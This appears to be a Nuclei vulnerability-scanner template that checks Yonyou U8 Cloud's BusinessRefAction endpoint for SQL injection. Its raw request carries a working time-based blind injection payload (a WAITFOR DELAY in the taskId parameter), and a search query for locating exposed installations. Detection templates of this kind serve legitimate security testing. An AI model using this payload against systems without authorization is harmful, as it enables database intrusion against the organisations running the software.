id: yonyou-u8-cloud-BusinessRefAction-sqli

info: 
  name: Yonyou U8 BusinessRefAction - SQL Injection
  author: mask-git
  severity: high
  description: |
   The Yonyou U8 Cloud /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.web.reference.BusinessRefAction contains a SQL injection vulnerability.
  reference:
    -
    -
  metadata:
    verified: true
    max-request: 1 
    hunter: app.name="用友 U8 Cloud"
  tags: yonyou,U8,sqli

http:
  - raw:
      - |
        GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.web.reference.BusinessRefAction&method=getTaskRepTreeRef&taskId=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close
    
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=5'
          - 'status_code == 200'
        condition: and
